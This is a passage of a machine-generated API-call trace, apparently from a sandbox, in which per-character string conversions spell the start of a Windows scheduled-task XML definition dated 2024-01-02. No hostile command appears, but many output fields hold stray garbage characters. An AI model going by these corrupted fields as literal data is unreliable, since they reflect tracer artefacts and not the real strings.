[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="U", cbMultiByte=1, lpWideCharStr=0x369db04, cchWideChar=1 | out: lpWideCharStr="U") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x369db06, cchWideChar=1 | out: lpWideCharStr="T\槛∃) returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0x369db08, cchWideChar=1 | out: lpWideCharStr="Fͩ") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x369db0a, cchWideChar=1 | out: lpWideCharStr="-") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369db0c, cchWideChar=1 | out: lpWideCharStr="1") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="6", cbMultiByte=1, lpWideCharStr=0x369db0e, cchWideChar=1 | out: lpWideCharStr="6\槛∃) returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db10, cchWideChar=1 | out: lpWideCharStr="\"ͩ") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="?", cbMultiByte=1, lpWideCharStr=0x369db12, cchWideChar=1 | out: lpWideCharStr="?") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369db14, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369db16, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369db18, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369db1a, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x369db1c, cchWideChar=1 | out: lpWideCharStr="T") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369db1e, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db20, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x369db22, cchWideChar=1 | out: lpWideCharStr="k") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369db24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x369db26, cchWideChar=1 | out: lpWideCharStr="v\槛∃) returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369db28, cchWideChar=1 | out: lpWideCharStr="eͩ") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369db2a, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db2c, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369db2e, cchWideChar=1 | out: lpWideCharStr="i\槛∃) returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db30, cchWideChar=1 | out: lpWideCharStr="oͩ") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369db32, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x369db34, cchWideChar=1 | out: lpWideCharStr="=") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db36, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369db38, cchWideChar=1 | out: lpWideCharStr="1") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x369db3a, cchWideChar=1 | out: lpWideCharStr=".") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369db3c, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db3e, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369db40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x369db42, cchWideChar=1 | out: lpWideCharStr="x") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369db44, cchWideChar=1 | out: lpWideCharStr="m") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x369db46, cchWideChar=1 | out: lpWideCharStr="l\槛∃) returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369db48, cchWideChar=1 | out: lpWideCharStr="nͩ") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db4a, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x369db4c, cchWideChar=1 | out: lpWideCharStr="=") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db4e, cchWideChar=1 | out: lpWideCharStr="\"\槛∃) returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x369db50, cchWideChar=1 | out: lpWideCharStr="hͩ") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369db52, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369db54, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x369db56, cchWideChar=1 | out: lpWideCharStr="p") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x369db58, cchWideChar=1 | out: lpWideCharStr=":") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369db5a, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369db5c, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db5e, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x369db60, cchWideChar=1 | out: lpWideCharStr="c") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x369db62, cchWideChar=1 | out: lpWideCharStr="h") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369db64, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369db66, cchWideChar=1 | out: lpWideCharStr="m\槛∃) returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369db68, cchWideChar=1 | out: lpWideCharStr="aͩ") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db6a, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x369db6c, cchWideChar=1 | out: lpWideCharStr=".") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369db6e, cchWideChar=1 | out: lpWideCharStr="m\槛∃) returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369db70, cchWideChar=1 | out: lpWideCharStr="iͩ") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x369db72, cchWideChar=1 | out: lpWideCharStr="c") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369db74, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db76, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db78, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db7a, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x369db7c, cchWideChar=1 | out: lpWideCharStr="f") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369db7e, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x369db80, cchWideChar=1 | out: lpWideCharStr=".") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x369db82, cchWideChar=1 | out: lpWideCharStr="c") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db84, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369db86, cchWideChar=1 | out: lpWideCharStr="m\槛∃) returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369db88, cchWideChar=1 | out: lpWideCharStr="/ͩ") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x369db8a, cchWideChar=1 | out: lpWideCharStr="w") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369db8c, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369db8e, cchWideChar=1 | out: lpWideCharStr="n\槛∃) returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x369db90, cchWideChar=1 | out: lpWideCharStr="dͩ") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db92, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x369db94, cchWideChar=1 | out: lpWideCharStr="w") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db96, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369db98, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369db9a, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369db9c, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369db9e, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="4", cbMultiByte=1, lpWideCharStr=0x369dba0, cchWideChar=1 | out: lpWideCharStr="4") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dba2, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dba4, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dba6, cchWideChar=1 | out: lpWideCharStr="2\槛∃) returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dba8, cchWideChar=1 | out: lpWideCharStr="/ͩ") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369dbaa, cchWideChar=1 | out: lpWideCharStr="m") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dbac, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbae, cchWideChar=1 | out: lpWideCharStr="t\槛∃) returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dbb0, cchWideChar=1 | out: lpWideCharStr="/ͩ") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbb2, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dbb4, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dbb6, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x369dbb8, cchWideChar=1 | out: lpWideCharStr="k") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369dbba, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dbbc, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dbbe, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dbc0, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbc2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbc4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dbc6, cchWideChar=1 | out: lpWideCharStr="<\槛∃) returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x369dbc8, cchWideChar=1 | out: lpWideCharStr="Rͩ") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dbca, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dbcc, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dbce, cchWideChar=1 | out: lpWideCharStr="i\槛∃) returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dbd0, cchWideChar=1 | out: lpWideCharStr="sͩ") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbd2, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dbd4, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dbd6, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbd8, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dbda, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dbdc, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dbde, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x369dbe0, cchWideChar=1 | out: lpWideCharStr="I") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dbe2, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x369dbe4, cchWideChar=1 | out: lpWideCharStr="f") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dbe6, cchWideChar=1 | out: lpWideCharStr="o\槛∃) returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dbe8, cchWideChar=1 | out: lpWideCharStr=">ͩ") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dbea, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dbec, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbee, cchWideChar=1 | out: lpWideCharStr=" \槛∃) returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbf0, cchWideChar=1 | out: lpWideCharStr=" ͩ") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbf2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbf4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dbf6, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x369dbf8, cchWideChar=1 | out: lpWideCharStr="D") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dbfa, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbfc, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dbfe, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc00, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc02, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dc04, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc06, cchWideChar=1 | out: lpWideCharStr="2\槜∃) returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="4", cbMultiByte=1, lpWideCharStr=0x369dc08, cchWideChar=1 | out: lpWideCharStr="4ͩ") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x369dc0a, cchWideChar=1 | out: lpWideCharStr="-") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dc0c, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dc0e, cchWideChar=1 | out: lpWideCharStr="1\槜∃) returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x369dc10, cchWideChar=1 | out: lpWideCharStr="-ͩ") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dc12, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc14, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x369dc16, cchWideChar=1 | out: lpWideCharStr="T") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc18, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dc1a, cchWideChar=1 | out: lpWideCharStr="1") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x369dc1c, cchWideChar=1 | out: lpWideCharStr=":") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dc1e, cchWideChar=1 | out: lpWideCharStr="0") returned 1
